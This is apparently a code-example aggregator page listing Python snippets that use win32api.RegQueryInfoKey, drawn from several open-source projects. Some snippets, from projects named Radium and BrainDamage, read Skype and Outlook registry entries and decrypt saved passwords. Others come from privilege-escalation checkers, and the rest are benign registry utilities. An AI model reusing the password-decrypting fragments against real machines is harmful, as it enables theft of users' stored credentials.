Python win32api.RegQueryInfoKey() Examples
The following are 14
code examples of win32api.RegQueryInfoKey().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
win32api
, or try the search function
.
.
Example #1
| Source File: skype.py From Radium with Apache License 2.0 | 7 votes |
|
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
print e
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
Example #2
| Source File: outlook.py From Radium with Apache License 2.0 | 6 votes |
|
def retrieve_info(self, hkey, name_key):
values = {}
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if 'password' in k[0].lower():
try:
password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
values[k[0]] = password.decode('utf16')
except Exception, e:
values[k[0]] = 'N/A'
else:
try:
values[k[0]] = str(k[1]).decode('utf16')
except:
values[k[0]] = str(k[1])
Example #3
| Source File: windows-privesc-check.py From WHP with Do What The F*ck You Want To Public License | 6 votes |
|
def get_user_paths(): try: keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ) except: return 0 paths = [] subkeys = win32api.RegEnumKeyEx(keyh) for subkey in subkeys: try: subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] + "\\Environment" , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ) except: pass else: subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh) try: path, type = win32api.RegQueryValueEx(subkeyh, "PATH") paths.append((subkey[0], path)) except: pass return paths
Example #4
| Source File: windowsprivcheck.py From LHF with GNU General Public License v3.0 | 6 votes |
|
def get_user_paths(): try: keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ) except: return 0 paths = [] subkeys = win32api.RegEnumKeyEx(keyh) for subkey in subkeys: try: subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] + "\\Environment" , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ) except: pass else: subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh) try: path, type = win32api.RegQueryValueEx(subkeyh, "PATH") paths.append((subkey[0], path)) except: pass return paths
Example #5
| Source File: outlook.py From BrainDamage with Apache License 2.0 | 6 votes |
|
def retrieve_info(self, hkey, name_key):
values = {}
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if 'password' in k[0].lower():
try:
password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
values[k[0]] = password.decode('utf16')
except Exception, e:
values[k[0]] = 'N/A'
else:
try:
values[k[0]] = str(k[1]).decode('utf16')
except:
values[k[0]] = str(k[1])
Example #6
| Source File: skype.py From BrainDamage with Apache License 2.0 | 6 votes |
|
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
# print e
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
Example #7
| Source File: regedit.py From ironpython2 with Apache License 2.0 | 5 votes |
|
def IsExpandable(self): # All keys are expandable, even if they currently have zero children. return 1 ## hkey = win32api.RegOpenKey(self.keyRoot, self.keyName) ## try: ## keys, vals, dt = win32api.RegQueryInfoKey(hkey) ## return (keys>0) ## finally: ## win32api.RegCloseKey(hkey)
Example #8
| Source File: win32serviceutil.py From ironpython2 with Apache License 2.0 | 5 votes |
|
def _GetServiceShortName(longName):
# looks up a services name
# from the display name
# Thanks to Andy McKay for this code.
access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
num = win32api.RegQueryInfoKey(hkey)[0]
longName = longName.lower()
# loop through number of subkeys
for x in range(0, num):
# find service name, open subkey
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, svc, 0, access)
try:
# find display name
thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if thisName.lower() == longName:
return svc
except win32api.error:
# in case there is no key called DisplayName
pass
return None
# Open a service given either it's long or short name.
Example #9
| Source File: recipe-265858.py From code with MIT License | 5 votes |
|
def getSoftwareList(self):
try:
hCounter=0
hAttCounter=0
# connecting to the base
hHandle = win32api.RegConnectRegistry(None,win32con.HKEY_LOCAL_MACHINE)
# getting the machine name and domain name
hCompName = win32api.GetComputerName()
hDomainName = win32api.GetDomainName()
# opening the sub key to get the list of Softwares installed
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,self.CONST_SW_SUBKEY,0,win32con.KEY_ALL_ACCESS)
# get the total no. of sub keys
hNoOfSubNodes = win32api.RegQueryInfoKey(hHandle)
# delete the entire data and insert it again
#deleteMachineSW(hCompName,hDomainName)
# browsing each sub Key which can be Applications installed
while hCounter < hNoOfSubNodes[0]:
hAppName = win32api.RegEnumKey(hHandle,hCounter)
hPath = self.CONST_SW_SUBKEY + "\\" + hAppName
# initialising hAttCounter
hAttCounter = 0
hOpenApp = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,hPath,0,win32con.KEY_ALL_ACCESS)
# [1] will give the no. of attributes in this sub key
hKeyCount = win32api.RegQueryInfoKey(hOpenApp)
hMaxKeyCount = hKeyCount[1]
hSWName = ""
hSWVersion = ""
while hAttCounter < hMaxKeyCount:
hData = win32api.RegEnumValue(hOpenApp,hAttCounter)
if hData[0]== "DisplayName":
hSWName = hData[1]
self.preparefile("SW Name",hSWName)
elif hData[0]== "DisplayVersion":
hSWVersion = hData[1]
self.preparefile("SW Version",hSWVersion)
hAttCounter = hAttCounter + 1
#if (hSWName !=""):
#insertMachineSW(hCompName,hDomainName,hSWName,hSWVersion)
hCounter = hCounter + 1
except:
self.preparefile("Exception","In exception in getSoftwareList")
Example #10
| Source File: impdirector.py From ConTroll_Remote_Access_Trojan with Apache License 2.0 | 5 votes |
|
def __init__(self):
self.path = "WindowsRegistry"
self.map = {}
try:
import win32api
import win32con
except ImportError:
return
subkey = r"Software\Python\PythonCore\%s\Modules" % sys.winver
for root in (win32con.HKEY_CURRENT_USER, win32con.HKEY_LOCAL_MACHINE):
try:
hkey = win32api.RegOpenKeyEx(root, subkey, 0, win32con.KEY_READ)
except Exception, e:
logger.debug('RegistryImportDirector: %s' % e)
continue
numsubkeys, numvalues, lastmodified = win32api.RegQueryInfoKey(hkey)
for i in range(numsubkeys):
subkeyname = win32api.RegEnumKey(hkey, i)
hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0, win32con.KEY_READ)
val = win32api.RegQueryValueEx(hskey, '')
desc = getDescr(val[0])
#print " RegistryImportDirector got %s %s" % (val[0], desc) #XXX
self.map[subkeyname] = (val[0], desc)
hskey.Close()
hkey.Close()
break
Example #11
| Source File: ImportManager.py From moviegrabber with GNU General Public License v3.0 | 5 votes |
|
def __init__(self):
self.path = "WindowsRegistry"
self.map = {}
try:
import win32api
## import win32con
except ImportError:
pass
else:
HKEY_CURRENT_USER = -2147483647
HKEY_LOCAL_MACHINE = -2147483646
KEY_ALL_ACCESS = 983103
subkey = r"Software\Python\PythonCore\%s\Modules" % sys.winver
for root in (HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE):
try:
hkey = win32api.RegOpenKeyEx(root, subkey, 0, KEY_ALL_ACCESS)
except:
pass
else:
numsubkeys, numvalues, lastmodified = win32api.RegQueryInfoKey(hkey)
for i in range(numsubkeys):
subkeyname = win32api.RegEnumKey(hkey, i)
hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0, KEY_ALL_ACCESS)
val = win32api.RegQueryValueEx(hskey, '')
desc = getDescr(val[0])
self.map[subkeyname] = (val[0], desc)
hskey.Close()
hkey.Close()
break
Example #12
| Source File: windows-privesc-check.py From WHP with Do What The F*ck You Want To Public License | 4 votes |
|
def check_event_logs():
key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
try:
keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
print "Can't open: " + key_string
return 0
subkeys = win32api.RegEnumKeyEx(keyh)
for subkey in subkeys:
# print key_string + "\\" + subkey[0]
sys.stdout.write(".")
try:
subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
print "Can't open: " + key_string
else:
subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
# print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)
try:
filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
except:
pass
else:
weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
if weak_perms:
# print "------------------------------------------------"
# print "Weak permissions found on event log display DLL:"
# print_weak_perms("File", weak_perms)
sys.stdout.write("!")
save_issue("WPC008", "writable_eventlog_dll", weak_perms)
try:
filename, type = win32api.RegQueryValueEx(subkeyh, "File")
except:
pass
else:
weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
if weak_perms:
# print "------------------------------------------------"
# print "Weak permissions found on event log file:"
# print_weak_perms("File", weak_perms)
sys.stdout.write("!")
save_issue("WPC007", "writable_eventlog_file", weak_perms)
print
#sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
#print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION)
Example #13
| Source File: recipe-265858.py From code with MIT License | 4 votes |
|
def getSysInfo(self):
try:
hCounter=0
hProcessorName=""
# connecting to the base
hHandle = win32api.RegConnectRegistry(None,self.HKEY_LOCAL_MACHINE)
# opening the sub key to get the processor name
print "debug1"
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,self.CONST_PROC_SUBKEY,0,win32con.KEY_ALL_ACCESS)
hNoOfKeys = win32api.RegQueryInfoKey(hHandle)[1]
while hCounter < hNoOfKeys:
hData = win32api.RegEnumValue(hHandle,hCounter)
if hData[0]== "Identifier":
hProcessorName = hData[1]
hCounter = hCounter + 1
if hProcessorName=="":
hProcessorName = "Processor Name Cannot be determined"
self.preparefile("Processor Name",hProcessorName)
hCompName = win32api.GetComputerName()
self.preparefile("Computer Name",hCompName)
hDomainName = win32api.GetDomainName()
self.preparefile("Domain Name",hDomainName)
hUserName = win32api.GetUserName()
self.preparefile("User Name",hUserName)
# getting OS Details
hCounter=0
# opening the sub key to get the processor name
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,self.CONST_OS_SUBKEY,0,win32con.KEY_ALL_ACCESS)
hNoOfKeys = win32api.RegQueryInfoKey(hHandle)[1]
hOSVersion=""
hOSName=""
while hCounter < hNoOfKeys:
hData = win32api.RegEnumValue(hHandle,hCounter)
if hData[0]== "ProductName":
hOSName = hData[1]
self.preparefile("OS Name",hOSName)
break
hCounter = hCounter + 1
if hOSName=="":
self.preparefile("OS Name","OS Name could not be read from the registry")
hCounter = 0
while hCounter < hNoOfKeys:
hData = win32api.RegEnumValue(hHandle,hCounter)
if hData[0]== "CSDVersion":
hOSVersion = hData[1]
self.preparefile("OS Version",hOSVersion)
break
hCounter = hCounter + 1
if hOSVersion=="":
self.preparefile("OS Version","OS Version could not be read from the registry")
# inserting master data
#insertMachineMaster(hCompName,hDomainName,hOSName,hOSVersion,hProcessorName)
except:
self.preparefile("Exception","in Exception in getSysDetails")
Example #14
| Source File: windowsprivcheck.py From LHF with GNU General Public License v3.0 | 4 votes |
|
def check_event_logs():
key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
try:
keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
print "Can't open: " + key_string
return 0
subkeys = win32api.RegEnumKeyEx(keyh)
for subkey in subkeys:
# print key_string + "\\" + subkey[0]
sys.stdout.write(".")
try:
subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
print "Can't open: " + key_string
else:
subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
# print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)
try:
filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
except:
pass
else:
weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
if weak_perms:
# print "------------------------------------------------"
# print "Weak permissions found on event log display DLL:"
# print_weak_perms("File", weak_perms)
sys.stdout.write("!")
save_issue("WPC008", "writable_eventlog_dll", weak_perms)
try:
filename, type = win32api.RegQueryValueEx(subkeyh, "File")
except:
pass
else:
weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
if weak_perms:
# print "------------------------------------------------"
# print "Weak permissions found on event log file:"
# print_weak_perms("File", weak_perms)
sys.stdout.write("!")
save_issue("WPC007", "writable_eventlog_file", weak_perms)
print
#sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
#print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION)
